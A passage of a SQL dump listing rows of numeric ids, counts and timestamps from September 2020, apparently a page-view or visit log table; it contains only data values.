17:38:59'),(6033,3107,1,'2020-09-07','2020-09-07 17:58:29'),(6034,80,1,'2020-09-07','2020-09-07 18:08:29'),(6035,68,1,'2020-09-07','2020-09-07 18:12:16'),(6036,1600,1,'2020-09-07','2020-09-07 18:19:20'),(6037,1588,1,'2020-09-07','2020-09-07 18:48:50'),(6038,3034,1,'2020-09-07','2020-09-07 19:27:33'),(6039,2457,1,'2020-09-07','2020-09-07 19:39:18'),(6040,2609,1,'2020-09-07','2020-09-07 19:49:18'),(6041,76,1,'2020-09-07','2020-09-07 20:09:43'),(6042,2309,1,'2020-09-07','2020-09-07 20:49:29'),(6043,1604,1,'2020-09-07','2020-09-07 21:30:20'),(6044,2309,1,'2020-09-07','2020-09-07 21:31:23'),(6045,570,1,'2020-09-07','2020-09-07 21:39:40'),(6046,80,1,'2020-09-07','2020-09-07 22:20:12'),(6047,3030,1,'2020-09-07','2020-09-07 22:33:05'),(6048,2309,1,'2020-09-08','2020-09-08 00:20:58'),(6049,91,1,'2020-09-08','2020-09-08 00:51:06'),(6050,1604,1,'2020-09-08','2020-09-08 02:02:19'),(6051,2609,1,'2020-09-08','2020-09-08 02:33:28'),(6052,1614,1,'2020-09-08','2020-09-08 02:42:20'),(6053,1588,1,'2020-09-08','2020-09-08 03:22:17'),(6054,108,1,'2020-09-08','2020-09-08 03:32:22'),(6055,3058,1,'2020-09-08','2020-09-08 03:42:55'),(6056,3081,1,'2020-09-08','2020-09-08 04:13:04'),(6057,1582,1,'2020-09-08','2020-09-08 04:22:35'),(6058,1606,1,'2020-09-08','2020-09-08 06:32:35'),(6059,468,1,'2020-09-08','2020-09-08 07:32:36'),(6060,72,1,'2020-09-08','2020-09-08 08:21:09'),(6061,3051,1,'2020-09-08','2020-09-08 08:22:14'),(6062,76,1,'2020-09-08','2020-09-08 08:30:18'),(6063,1604,1,'2020-09-08','2020-09-08 09:38:53'),(6064,80,1,'2020-09-08','2020-09-08 09:39:52'),(6065,1586,1,'2020-09-08','2020-09-08 09:48:00'),(6066,1604,1,'2020-09-08','2020-09-08 10:20:24'),(6067,91,1,'2020-09-08','2020-09-08 11:14:23'),(6068,91,1,'2020-09-08','2020-09-08 11:16:28'),(6069,91,1,'2020-09-08','2020-09-08 11:17:40'),(6070,2410,1,'2020-09-08','2020-09-08 11:52:37'),(6071,2801,1,'2020-09-08','2020-09-08 12:06:57'),(6072,89,1,'2020-09-08','2020-09-08 12:09:50'),(6073,1598,1,'2020-09-08','2020-09-08 12:11:20'),(6074,1598,1,'2020-09-08','2020-09-08 12:12:25'),(6075,89,1,'2020-09-08','2020-09-08 12:12:40'),(6076,89,1,'2020-09-08','2020-09-08 12:13:27'),(6077,2457,1,'2020-09-08','2020-09-08 12:13:35'),(6078,87,1,'2020-09-08','2020-09-08 12:13:57'),(6079,2309,1,'2020-09-08','2020-09-08 14:41:43'),(6080,2751,1,'2020-09-08','2020-09-08 16:45:16'),(6081,68,1,'2020-09-08','2020-09-08 16:51:39'),(6082,1600,1,'2020-09-08','2020-09-08 18:42:02'),(6083,1600,1,'2020-09-08','2020-09-08 18:42:17'),(6084,1739,1,'2020-09-08','2020-09-08 18:45:33'),(6085,1600,1,'2020-09-08','2020-09-08 18:49:33'),(6086,1724,1,'2020-09-08','2020-09-08 18:50:27'),(6087,2503,1,'2020-09-08','2020-09-08 18:54:37'),(6088,1600,1,'2020-09-08','2020-09-08 22:40:27'),(6089,3030,1,'2020-09-08','2020-09-08 22:45:30'),(6090,3030,1,'2020-09-08','2020-09-08 22:46:13'),(6091,1606,1,'2020-09-08','2020-09-08 23:54:51'),(6092,1544,1,'2020-09-09','2020-09-09 00:01:21'),(6093,2503,1,'2020-09-09','2020-09-09 02:10:33'),(6094,108,1,'2020-09-09','2020-09-09 03:55:40'),(6095,3038,1,'2020-09-09','2020-09-09 06:37:26'),(6096,68,1,'2020-09-09','2020-09-09 08:21:34'),(6097,2658,1,'2020-09-09','2020-09-09 09:05:53'),(6098,2309,1,'2020-09-09','2020-09-09 10:51:40'),(6099,2309,1,'2020-09-09','2020-09-09 10:51:50'),(6100,3004,1,'2020-09-09','2020-09-09 13:57:42'),(6101,1718,1,'2020-09-09','2020-09-09 14:35:35'),(6102,1606,1,'2020-09-09','2020-09-09 15:24:46'),(6103,2457,1,'2020-09-09','2020-09-09 16:13:09'),(6104,1718,1,'2020-09-09','2020-09-09 16:29:44'),(6105,3053,1,'2020-09-09','2020-09-09 17:11:30'),(6106,3058,1,'2020-09-09','2020-09-09 19:01:51'),(6107,2609,1,'2020-09-09','2020-09-09 19:31:43'),(6108,2609,1,'2020-09-09','2020-09-09 19:46:06'),(6109,1600,1,'2020-09-09','2020-09-09 21:31:17'),(6110,3030,1,'2020-09-09','2020-09-09 22:13:30'),(6111,3081,1,'2020-09-10','2020-09-10 01:59:26'),(6112,1588,1,'2020-09-10','2020-09-10 03:05:46'),(6113,1614,1,'2020-09-10','2020-09-10 05:08:40'),(6114,1600,1,'2020-09-10','2020-09-10 07:11:01'),(6115,2309,1,'2020-09-10','2020-09-10 08:21:19'),(6116,3058,1,'2020-09-10','2020-09-10 09:51:33'),(6117,1604,1,'2020-09-10','2020-09-10 10:21:57'),(6118,3030,1,'2020-09-10','2020-09-10 10:31:52'),(6119,1604,1,'2020-09-10','2020-09-10 11:52:41'),(6120,2457,1,'2020-09-10','2020-09-10 11:53:00'),(6121,1544,1,'2020-09-10','2020-09-10 11:53:01'),(6122,3069,1,'2020-09-10','2020-09-10 14:33:37'),(6123,108,1,'2020-09-10','2020-09-10 15:12:52'),(6124,3081,1,'2020-09-10','2020-09-10 16:10:51'),(6125,1598,1,'2020-09-10','2020-09-10 18:21:43'),(6126,1598,1,'2020-09-10','2020-09-10 18:22:24'),(6127,76,1,'2020-09-10','2020-09-10 18:24:29'),(6128,76,1,'2020-09-10','2020-09-10 18:26:09'),(6129,1598,1,'2020-09-10','2020-09-10 18:27:21'),(6130,1600,1,'2020-09-10','2020-09-10 19:15:17'),(6131,2309,1,'2020-09-10','2020-09-10 19:24:51'),(6132,487,1,'2020-09-10','2020-09-10 19:25:00'),(6133,2748,1,'2020-09-10','2020-09-10 19:55:10'),(6134,1604,1,'2020-09-10','2020-09-10 20:16:17'),(6135,1600,1,'2020-09-10','2020-09-10 20:25:51'),(6136,2609,1,'2020-09-10','2020-09-10 21:31:58'),(6137,2609,1,'2020-09-10','2020-09-10 21:32:55'),(6138,2609,1,'2020-09-10','2020-09-10 21:41:17'),(6139,1582,1,'2020-09-10','2020-09-10 22:33:59'),(6140,76,1,'2020-09-10','2020-09-10 22:36:54'),(6141,89,1,'2020-09-10','2020-09-10 22:37:36'),(6142,487,1,'2020-09-10','2020-09-10 22:38:53'),(6143,1586,1,'2020-09-10','2020-09-10 22:38:55'),(6144,468,1,'2020-09-10','2020-09-10 22:40:50'),(6145,3058,1,'2020-09-11','2020-09-11 00:08:08'),(6146,1604,1,'2020-09-11','2020-09-11 00:47:06'),(6147,1604,1,'2020-09-11','2020-09-11 00:48:59'),(6148,2609,1,'2020-09-11','2020-09-11 01:22:11'),(6149,2309,1,'2020-09-11','2020-09-11 01:27:03'),(6150,2309,1,'2020-09-11','2020-09-11 02:23:51'),(6151,3030,1,'2020-09-11','2020-09-11 02:38:26'),(6152,1600,1,'2020-09-11','2020-09-11 03:57:41'),(6153,2309,1,'2020-09-11','2020-09-11 04:37:41'),(6154,1604,1,'2020-09-11','2020-09-11 05:20:23'),(6155,1604,1,'2020-09-11','2020-09-11 05:22:29'),(6156,91,1,'2020-09-11','2020-09-11 05:23:36'),(6157,1604,1,'2020-09-11','2020-09-11 05:24:12'),(6158,3045,1,'2020-09-11','2020-09-11 06:56:15'),(6159,1600,1,'2020-09-11','2020-09-11 07:11:17'),(6160,2617,1,'2020-09-11','2020-09-11 07:52:10'),(6161,91,1,'2020-09-11','2020-09-11 07:53:52'),(6162,89,1,'2020-09-11','2020-09-11 07:55:02'),(6163,84,1,'2020-09-11','2020-09-11 07:55:42'),(6164,89,1,'2020-09-11','2020-09-11 07:55:51'),(6165,68,1,'2020-09-11','2020-09-11 07:56:25'),(6166,72,1,'2020-09-11','2020-09-11 07:57:17'),(6167,2609,1,'2020-09-11','2020-09-11 08:48:15'),(6168,1614,1,'2020-09-11','2020-09-11 08:58:26'),(6169,1600,1,'2020-09-11','2020-09-11 09:24:52'),(6170,1588,1,'2020-09-11','2020-09-11 10:08:51'),(6171,3069,1,'2020-09-11','2020-09-11 10:22:44'),(6172,1588,1,'2020-09-11','2020-09-11 12:59:26'),(6173,2751,1,'2020-09-11','2020-09-11 13:41:43'),(6174,2751,1,'2020-09-11','2020-09-11 13:41:55'),(6175,486,1,'2020-09-11','2020-09-11 14:16:07'),(6176,3030,1,'2020-09-11','2020-09-11 14:49:48'),(6177,1600,1,'2020-09-11','2020-09-11 15:50:52'),(6178,1598,1,'2020-09-11','2020-09-11 15:56:00'),(6179,1600,1,'2020-09-11','2020-09-11 15:59:45'),(6180,2309,1,'2020-09-11','2020-09-11 16:49:48'),(6181,1600,1,'2020-09-11','2020-09-11 17:41:33'),(6182,1600,1,'2020-09-11','2020-09-11 18:33:31'),(6183,3081,1,'2020-09-11','2020-09-11 18:45:58'),(6184,3069,1,'2020-09-11','2020-09-11 19:52:01'),(6185,1614,1,'2020-09-11','2020-09-11 20:11:28'),(6186,1588,1,'2020-09-11','2020-09-11 20:31:22'),(6187,2609,1,'2020-09-11','2020-09-11 20:41:36'),(6188,1588,1,'2020-09-11','2020-09-11 21:22:41'),(6189,3030,1,'2020-09-12','2020-09-12 01:42:22'),(6190,1600,1,'2020-09-12','2020-09-12 01:43:27'),(6191,2557,1,'2020-09-12','2020-09-12 02:29:59'),(6192,2309,1,'2020-09-12','2020-09-12 03:24:43'),(6193,2769,1,'2020-09-12','2020-09-12 03:34:47'),(6194,1606,1,'2020-09-12','2020-09-12 03:53:42'),(6195,3030,1,'2020-09-12','2020-09-12 03:56:37'),(6196,2658,1,'2020-09-12','2020-09-12 03:59:19'),(6197,1588,1,'2020-09-12','2020-09-12 04:03:10'),(6198,1604,1,'2020-09-12','2020-09-12 04:56:41'),(6199,2309,1,'2020-09-12','2020-09-12 05:06:37'),(6200,3069,1,'2020-09-12','2020-09-12 06:21:47'),(6201,1588,1,'2020-09-12','2020-09-12 10:25:34'),(6202,1588,1,'2020-09-12','2020-09-12 12:17:54'),(6203,2420,1,'2020-09-12','2020-09-12 14:29:14'),(6204,2309,1,'2020-09-12','2020-09-12 14:33:24'),(6205,1872,1,'2020-09-12','2020-09-12 15:18:48'),(6206,2309,1,'2020-09-12','2020-09-12 15:39:28'),(6207,2309,1,'2020-09-12','2020-09-12 16:11:41'),(6208,1604,1,'2020-09-12','2020-09-12 22:21:39'),(6209,2801,1,'2020-09-12','2020-09-12 23:20:37'),(6210,1614,1,'2020-09-13','2020-09-13 01:09:12'),(6211,1600,1,'2020-09-13','2020-09-13 02:20:44'),(6212,1600,1,'2020-09-13','2020-09-13 03:11:47'),(6213,3069,1,'2020-09-13','2020-09-13 06:47:33'),(6214,2658,1,'2020-09-13','2020-09-13 07:50:35'),(6215,2309,1,'2020-09-13','2020-09-13 08:21:32'),(6216,1600,1,'2020-09-13','2020-09-13 08:34:25'),(6217,2801,1,'2020-09-13','2020-09-13 08:51:19'),(6218,87,1,'2020-09-13','2020-09-13 09:35:09'),(6219,1614,1,'2020-09-13','2020-09-13 10:22:03'),(6220,1606,1,'2020-09-13','2020-09-13 10:59:26'),(6221,3087,1,'2020-09-13','2020-09-13 11:15:18'),(6222,2248,1,'2020-09-13','2020-09-13 11:34:29'),(6223,1600,1,'2020-09-13','2020-09-13 11:48:24'),(6224,1600,1,'2020-09-13','2020-09-13 12:42:24'),(6225,486,1,'2020-09-13','2020-09-13 13:19:32'),(6226,1588,1,'2020-09-13','2020-09-13 14:13:36'),(6227,2989,1,'2020-09-13','2020-09-13 19:26:41'),(6228,1586,1,'2020-09-13','2020-09-13 19:27:39'),(6229,2751,1,'2020-09-13','2020-09-13 21:57:10'),(6230,2309,1,'2020-09-13','2020-09-13 22:20:00'),(6231,72,1,'2020-09-13','2020-09-13 22:23:39'),(6232,2159,1,'2020-09-13','2020-09-13 23:31:47'),(6233,1588,1,'2020-09-13','2020-09-13 23:55:20'),(6234,1604,1,'2020-09-14','2020-09-14 02:31:57'),(6235,3023,1,'2020-09-14','2020-09-14 02:54:49'),(6236,1606,1,'2020-09-14','2020-09-14 06:06:40'),(6237,1614,1,'2020-09-14','2020-09-14 06:37:02'),(6238,1604,1,'2020-09-14','2020-09-14 10:50:47'),(6239,1604,1,'2020-09-14','2020-09-14 10:50:50'),(6240,1604,1,'2020-09-14','2020-09-14 10:53:47'),(6241,1604,1,'2020-09-14','2020-09-14 10:53:57'),(6242,1604,1,'2020-09-14','2020-09-14 10:55:18'),(6243,2457,1,'2020-09-14','2020-09-14 11:19:46'),(6244,80,1,'2020-09-14','2020-09-14 11:22:45'),(6245,2457,1,'2020-09-14','2020-09-14 11:23:09'),(6246,1604,1,'2020-09-14','2020-09-14 13:19:28'),(6247,1604,1,'2020-09-14','2020-09-14 13:23:00'),(6248,1604,1,'2020-09-14','2020-09-14 13:23:17'),(6249,1604,1,'2020-09-14','2020-09-14 13:23:35'),(6250,1604,1,'2020-09-14','2020-09-14 13:24:06'),(6251,1600,1,'2020-09-14','2020-09-14 13:50:48'),(6252,1600,1,'2020-09-14','2020-09-14 14:39:57'),(6253,1586,1,'2020-09-14','2020-09-14 14:56:50'),(6254,91,1,'2020-09-14','2020-09-14 15:24:08'),(6255,91,1,'2020-09-14','2020-09-14 15:26:50'),(6256,76,1,'2020-09-14','2020-09-14 15:27:16'),(6257,76,1,'2020-09-14','2020-09-14 15:27:20'),(6258,2769,1,'2020-09-14','2020-09-14 18:00:30'),(6259,2769,1,'2020-09-14','2020-09-14 18:01:22'),(6260,2769,1,'2020-09-14','2020-09-14 18:01:27'),(6261,2769,1,'2020-09-14','2020-09-14 18:04:15'),(6262,1586,1,'2020-09-14','2020-09-14 20:11:30'),(6263,1586,1,'2020-09-14','2020-09-14 20:11:38'),(6264,3066,1,'2020-09-15','2020-09-15 00:02:34'),(6265,3063,1,'2020-09-15','2020-09-15 00:03:59'),(6266,476,1,'2020-09-15','2020-09-15 00:05:26'),(6267,482,1,'2020-09-15','2020-09-15 00:06:15'),(6268,467,1,'2020-09-15','2020-09-15 00:07:30'),(6269,483,1,'2020-09-15','2020-09-15 00:07:57'),(6270,478,1,'2020-09-15','2020-09-15 00:08:03'),(6271,3127,1,'2020-09-15','2020-09-15 00:10:37'),(6272,472,1,'2020-09-15','2020-09-15 00:11:30'),(6273,471,1,'2020-09-15','2020-09-15 00:12:31'),(6274,3092,1,'2020-09-15','2020-09-15 00:14:04'),(6275,2293,1,'2020-09-15','2020-09-15 00:14:09'),(6276,3023,1,'2020-09-15','2020-09-15 00:15:50'),(6277,2297,1,'2020-09-15','2020-09-15 00:16:08'),(6278,2658,1,'2020-09-15','2020-09-15 00:16:39'),(6279,1743,1,'2020-09-15','2020-09-15 00:18:28'),(6280,1606,1,'2020-09-15','2020-09-15 02:04:20'),(6281,80,1,'2020-09-15','2020-09-15 02:06:52'),(6282,3023,1,'2020-09-15','2020-09-15 02:44:50'),(6283,2159,1,'2020-09-15','2020-09-15 04:23:23'),(6284,108,1,'2020-09-15','2020-09-15 05:45:17'),(6285,2309,1,'2020-09-15','2020-09-15 07:20:17'),(6286,2309,1,'2020-09-15','2020-09-15 07:31:12'),(6287,470,1,'2020-09-15','2020-09-15 07:53:37'),(6288,1606,1,'2020-09-15','2020-09-15 08:10:48'),(6289,1600,1,'2020-09-15','2020-09-15 09:39:12'),(6290,1715,1,'2020-09-15','2020-09-15 10:35:41'),(6291,1588,1,'2020-09-15','2020-09-15 10:49:41'),(6292,80,1,'2020-09-15','2020-09-15 10:53:15'),(6293,1588,1,'2020-09-15','2020-09-15 10:53:47'),(6294,1602,1,'2020-09-15','2020-09-15 11:12:53'),(6295,91,1,'2020-09-15','2020-09-15 11:40:31'),(6296,3087,1,'2020-09-15','2020-09-15 11:44:50'),(6297,91,1,'2020-09-15','2020-09-15 11:53:56'),(6298,91,1,'2020-09-15','2020-09-15 12:01:48'),(6299,76,1,'2020-09-15','2020-09-15 15:12:12'),(6300,87,1,'2020-09-15','2020-09-15 15:31:29'),(6301,2503,1,'2020-09-15','2020-09-15 15:32:14'),(6302,72,1,'2020-09-15','2020-09-15 15:32:30'),(6303,3058,1,'2020-09-15','2020-09-15 15:32:46'),(6304,89,1,'2020-09-15','2020-09-15 15:33:19'),(6305,89,1,'2020-09-15','2020-09-15 16:00:21'),(6306,1604,1,'2020-09-15','2020-09-15 16:04:45'),(6307,1604,1,'2020-09-15','2020-09-15 16:06:16'),(6308,1604,1,'2020-09-15','2020-09-15 16:06:25'),(6309,1604,1,'2020-09-15','2020-09-15 16:06:33'),(6310,1586,1,'2020-09-15','2020-09-15 16:15:55'),(6311,1604,1,'2020-09-15','2020-09-15 16:24:48'),(6312,1606,1,'2020-09-15','2020-09-15 17:13:41'),(6313,3083,1,'2020-09-15','2020-09-15 17:51:28'),(6314,3097,1,'2020-09-15','2020-09-15 18:48:51'),(6315,1600,1,'2020-09-15','2020-09-15 19:30:59'),(6316,1594,1,'2020-09-15','2020-09-15 19:48:23'),(6317,3072,1,'2020-09-15','2020-09-15 20:57:59'),(6318,1586,1,'2020-09-15','2020-09-15 21:09:52'),(6319,1586,1,'2020-09-15','2020-09-15 21:10:52'),(6320,570,1,'2020-09-15','2020-09-15 22:00:32'),(6321,2609,1,'2020-09-16','2020-09-16 00:08:01'),(6322,1697,1,'2020-09-16','2020-09-16 00:29:45'),(6323,1720,1,'2020-09-16','2020-09-16 00:30:04'),(6324,1606,1,'2020-09-16','2020-09-16 01:08:06'),(6325,1770,1,'2020-09-16','2020-09-16 06:07:52'),(6326,1774,1,'2020-09-16','2020-09-16 06:08:37'),(6327,2748,1,'2020-09-16','2020-09-16 06:09:00'),(6328,1745,1,'2020-09-16','2020-09-16 06:15:52'),(6329,1751,1,'2020-09-16','2020-09-16 06:26:57'),(6330,2457,1,'2020-09-16','2020-09-16 06:39:18'),(6331,89,1,'2020-09-16','2020-09-16 08:40:48'),(6332,3117,1,'2020-09-16','2020-09-16 08:50:59'),(6333,1606,1,'2020-09-16','2020-09-16 09:11:31'),(6334,91,1,'2020-09-16','2020-09-16 11:56:52'),(6335,1724,1,'2020-09-16','2020-09-16 11:58:10'),(6336,91,1,'2020-09-16','2020-09-16 11:58:25'),(6337,3117,1,'2020-09-16','2020-09-16 13:03:48'),(6338,2309,1,'2020-09-16','2020-09-16 14:47:51'),(6339,91,1,'2020-09-16','2020-09-16 14:49:39'),(6340,2410,1,'2020-09-16','2020-09-16 14:53:50'),(6341,1590,1,'2020-09-16','2020-09-16 15:00:32'),(6342,84,1,'2020-09-16','2020-09-16 15:09:32'),(6343,84,1,'2020-09-16','2020-09-16 15:48:23'),(6344,1877,1,'2020-09-16','2020-09-16 15:48:27'),(6345,76,1,'2020-09-16','2020-09-16 16:06:56'),(6346,3127,1,'2020-09-16','2020-09-16 16:21:12'),(6347,3072,1,'2020-09-16','2020-09-16 16:21:53'),(6348,2956,1,'2020-09-16','2020-09-16 16:22:20'),(6349,76,1,'2020-09-16','2020-09-16 16:26:36'),(6350,72,1,'2020-09-16','2020-09-16 16:27:11'),(6351,108,1,'2020-09-16','2020-09-16 16:29:15'),(6352,3127,1,'2020-09-16','2020-09-16 17:04:26'),(6353,108,1,'2020-09-16','2020-09-16 17:35:42'),(6354,2309,1,'2020-09-16','2020-09-16 17:47:11'),(6355,2309,1,'2020-09-16','2020-09-16 18:09:08'),(6356,2309,1,'2020-09-16','2020-09-16 19:09:25'),(6357,91,1,'2020-09-16','2020-09-16 20:10:15'),(6358,2457,1,'2020-09-16','2020-09-16 22:00:58'),(6359,2457,1,'2020-09-16','2020-09-16 23:04:01'),(6360,2457,1,'2020-09-16','2020-09-16 23:04:13'),(6361,2457,1,'2020-09-16','2020-09-16 23:04:14'),(6362,2309,1,'2020-09-17','2020-09-17 01:09:40'),(6363,2503,1,'2020-09-17','2020-09-17 06:04:31'),(6364,2309,1,'2020-09-17','2020-09-17 09:29:05'),(6365,570,1,'2020-09-17','2020-09-17 09:55:26'),(6366,84,1,'2020-09-17','2020-09-17 10:27:31'),(6367,91,1,'2020-09-17','2020-09-17 10:28:02'),(6368,1600,1,'2020-09-17','2020-09-17 11:21:09'),(6369,1600,1,'2020-09-17','2020-09-17 11:47:42'),(6370,1739,1,'2020-09-17','2020-09-17 13:49:09'),(6371,1600,1,'2020-09-17','2020-09-17 13:52:46'),(6372,84,1,'2020-09-17','2020-09-17 13:55:20'),(6373,87,1,'2020-09-17','2020-09-17 13:55:47'),(6374,473,1,'2020-09-17','2020-09-17 13:56:38'),(6375,87,1,'2020-09-17','2020-09-17 13:59:17'),(6376,486,1,'2020-09-17','2020-09-17 14:00:11'),(6377,87,1,'2020-09-17','2020-09-17 14:00:38'),(6378,68,1,'2020-09-17','2020-09-17 14:13:20'),(6379,1600,1,'2020-09-17','2020-09-17 15:45:24'),(6380,84,1,'2020-09-17','2020-09-17 15:47:19'),(6381,2457,1,'2020-09-17','2020-09-17 16:32:37'),(6382,1747,1,'2020-09-17','2020-09-17 17:03:19'),(6383,1747,1,'2020-09-17','2020-09-17 17:42:41'),(6384,3005,1,'2020-09-17','2020-09-17 17:50:37'),(6385,1600,1,'2020-09-17','2020-09-17 21:46:06'),(6386,1747,1,'2020-09-17','2020-09-17 23:16:17'),(6387,2457,1,'2020-09-17','2020-09-17 23:26:41'),(6388,2658,1,'2020-09-18','2020-09-18 02:37:33'),(6389,2989,1,'2020-09-18','2020-09-18 05:21:24'),(6390,2309,1,'2020-09-18','2020-09-18 05:29:41'),(6391,3069,1,'2020-09-18','2020-09-18 06:02:13'),(6392,2769,1,'2020-09-18','2020-09-18 07:30:01'),(6393,1604,1,'2020-09-18','2020-09-18 09:12:02'),(6394,1614,1,'2020-09-18','2020-09-18 09:52:18'),(6395,2813,1,'2020-09-18','2020-09-18 12:03:16'),(6396,2609,1,'2020-09-18','2020-09-18 12:42:56'),(6397,1600,1,'2020-09-18','2020-09-18 13:12:53'),(6398,2309,1,'2020-09-18','2020-09-18 13:33:53'),(6399,89,1,'2020-09-18','2020-09-18 13:34:20'),(6400,91,1,'2020-09-18','2020-09-18 13:35:55'),(6401,2904,1,'2020-09-18','2020-09-18 13:37:39'),(6402,87,1,'2020-09-18','2020-09-18 13:39:26'),(6403,72,1,'2020-09-18','2020-09-18 13:40:55'),(6404,80,1,'2020-09-18','2020-09-18 13:41:03'),(6405,335,1,'2020-09-18','2020-09-18 13:41:40'),(6406,2503,1,'2020-09-18','2020-09-18 13:42:31'),(6407,80,1,'2020-09-18','2020-09-18 13:46:00'),(6408,68,1,'2020-09-18','2020-09-18 13:54:03'),(6409,2309,1,'2020-09-18','2020-09-18 16:13:07'),(6410,2309,1,'2020-09-18','2020-09-18 16:33:18'),(6411,2457,1,'2020-09-18','2020-09-18 19:08:31'),(6412,2503,1,'2020-09-18','2020-09-18 20:23:14'),(6413,1588,1,'2020-09-18','2020-09-18 21:34:10'),(6414,1600,1,'2020-09-18','2020-09-18 21:54:14'),(6415,1600,1,'2020-09-19','2020-09-19 09:48:08'),(6416,1606,1,'2020-09-19','2020-09-19 10:31:58'),(6417,87,1,'2020-09-19','2020-09-19 10:33:13'),(6418,1606,1,'2020-09-19','2020-09-19 10:33:44'),(6419,1606,1,'2020-09-19','2020-09-19 10:47:33'),(6420,570,1,'2020-09-19','2020-09-19 11:08:59'),(6421,80,1,'2020-09-19','2020-09-19 11:49:25'),(6422,1614,1,'2020-09-19','2020-09-19 14:50:13'),(6423,1600,1,'2020-09-19','2020-09-19 15:00:00'),(6424,2503,1,'2020-09-19','2020-09-19 15:44:46'),(6425,470,1,'2020-09-19','2020-09-19 16:50:50'),(6426,486,1,'2020-09-20','2020-09-20 08:06:18'),(6427,1718,1,'2020-09-20','2020-09-20 12:41:16'),(6428,1614,1,'2020-09-20','2020-09-20 14:37:50'),(6429,1614,1,'2020-09-20','2020-09-20 14:42:41'),(6430,1614,1,'2020-09-20','2020-09-20 14:42:59'),(6431,1614,1,'2020-09-20','2020-09-20 14:43:16'),(6432,1614,1,'2020-09-20','2020-09-20 14:43:32'),(6433,1614,1,'2020-09-20','2020-09-20 14:43:50'),(6434,1600,1,'2020-09-20','2020-09-20 17:54:06'),(6435,1600,1,'2020-09-20','2020-09-20 17:54:27'),(6436,1600,1,'2020-09-20','2020-09-20 17:55:10'),(6437,1600,1,'2020-09-21','2020-09-21 05:18:47'),(6438,2457,1,'2020-09-21','2020-09-21 06:38:35'),(6439,2809,1,'2020-09-21','2020-09-21 09:07:58'),(6440,68,1,'2020-09-21','2020-09-21 09:24:28'),(6441,2159,1,'2020-09-21','2020-09-21 09:28:04'),(6442,91,1,'2020-09-21','2020-09-21 09:28:44'),(6443,89,1,'2020-09-21','2020-09-21 10:37:41'),(6444,1608,1,'2020-09-21','2020-09-21 10:46:20'),(6445,2309,1,'2020-09-21','2020-09-21 11:33:29'),(6446,1600,1,'2020-09-21','2020-09-21 12:19:55'),(6447,2309,1,'2020-09-21','2020-09-21 12:44:33'),(6448,1608,1,'2020-09-21','2020-09-21 12:46:06'),(6449,1600,1,'2020-09-21','2020-09-21 15:48:35'),(6450,1608,1,'2020-09-21','2020-09-21 18:00:12'),(6451,80,1,'2020-09-21','2020-09-21 23:03:06'),(6452,2989,1,'2020-09-22','2020-09-22 03:41:13'),(6453,91,1,'2020-09-22','2020-09-22 06:13:35'),(6454,1606,1,'2020-09-22','2020-09-22 10:37:11'),(6455,1600,1,'2020-09-22','2020-09-22 11:54:11'),(6456,1600,1,'2020-09-22','2020-09-22 11:54:15'),(6457,68,1,'2020-09-22','2020-09-22 12:11:24'),(6458,1588,1,'2020-09-22','2020-09-22 12:17:21'),(6459,3107,1,'2020-09-22','2020-09-22 14:22:46'),(6460,2419,1,'2020-09-22','2020-09-22 17:39:25'),(6461,3038,1,'2020-09-22','2020-09-22 18:21:56'),(6462,1695,1,'2020-09-22','2020-09-22 19:56:15'),(6463,89,1,'2020-09-22','2020-09-22 22:11:52'),(6464,1544,1,'2020-09-22','2020-09-22 22:12:36'),(6465,89,1,'2020-09-22','2020-09-22 22:14:19'),(6466,2457,1,'2020-09-22','2020-09-22 22:14:36'),(6467,89,1,'2020-09-22','2020-09-22 22:16:29'),(6468,1590,1,'2020-09-22','2020-09-22 22:17:24'),(6469,89,1,'2020-09-22','2020-09-22 23:03:11'),(6470,1608,1,'2020-09-22','2020-09-22 23:04:18'),(6471,89,1,'2020-09-22','2020-09-22 23:14:57'),(6472,1592,1,'2020-09-22','2020-09-22 23:18:38'),(6473,1582,1,'2020-09-23','2020-09-23 03:02:32'),(6474,474,1,'2020-09-23','2020-09-23 06:16:37'),(6475,483,1,'2020-09-23','2020-09-23 09:51:51'),(6476,2457,1,'2020-09-23','2020-09-23 09:59:07'),(6477,483,1,'2020-09-23','2020-09-23 10:07:46'),(6478,2309,1,'2020-09-23','2020-09-23 10:44:37'),(6479,1608,1,'2020-09-23','2020-09-23 11:07:33'),(6480,1598,1,'2020-09-23','2020-09-23 11:09:06'),(6481,483,1,'2020-09-23','2020-09-23 11:12:05'),(6482,1600,1,'2020-09-23','2020-09-23 11:23:51'),(6483,1600,1,'2020-09-23','2020-09-23 12:35:49'),(6484,89,1,'2020-09-23','2020-09-23 12:52:33'),(6485,1608,1,'2020-09-23','2020-09-23 13:45:57'),(6486,1588,1,'2020-09-23','2020-09-23 14:08:53'),(6487,1588,1,'2020-09-23','2020-09-23 14:09:13'),(6488,2904,1,'2020-09-23','2020-09-23 14:11:34'),(6489,2904,1,'2020-09-23','2020-09-23 14:11:35'),(6490,2904,1,'2020-09-23','2020-09-23 14:12:38'),(6491,2904,1,'2020-09-23','2020-09-23 14:12:38'),(6492,2904,1,'2020-09-23','2020-09-23 14:16:54'),(6493,2457,1,'2020-09-23','2020-09-23 15:00:45'),(6494,80,1,'2020-09-23','2020-09-23 15:48:50'),(6495,2159,1,'2020-09-23','2020-09-23 19:04:12'),(6496,1600,1,'2020-09-23','2020-09-23 20:07:31'),(6497,1600,1,'2020-09-23','2020-09-23 21:26:01'),(6498,1614,1,'2020-09-24','2020-09-24 02:10:32'),(6499,1594,1,'2020-09-24','2020-09-24 07:01:18'),(6500,1594,1,'2020-09-24','2020-09-24 07:02:43'),(6501,68,1,'2020-09-24','2020-09-24 07:58:38'),(6502,2617,1,'2020-09-24','2020-09-24 09:09:44'),(6503,1610,1,'2020-09-24','2020-09-24 10:44:09'),(6504,1588,1,'2020-09-24','2020-09-24 11:18:51'),(6505,2813,1,'2020-09-24','2020-09-24 12:20:23'),(6506,1614,1,'2020-09-24','2020-09-24 12:34:41'),(6507,74,1,'2020-09-24','2020-09-24 12:59:42'),(6508,89,1,'2020-09-24','2020-09-24 13:14:51'),(6509,1582,1,'2020-09-24','2020-09-24 13:15:38'),(6510,91,1,'2020-09-24','2020-09-24 13:15:47'),(6511,1598,1,'2020-09-24','2020-09-24 14:32:49'),(6512,1614,1,'2020-09-24','2020-09-24 14:40:35'),(6513,1749,1,'2020-09-24','2020-09-24 14:41:13'),(6514,1604,1,'2020-09-24','2020-09-24 15:30:06'),(6515,68,1,'2020-09-24','2020-09-24 15:30:46'),(6516,1600,1,'2020-09-24','2020-09-24 20:22:17'),(6517,3104,1,'2020-09-24','2020-09-24 20:24:00'),(6518,1600,1,'2020-09-24','2020-09-24 20:24:31'),(6519,68,1,'2020-09-24','2020-09-24 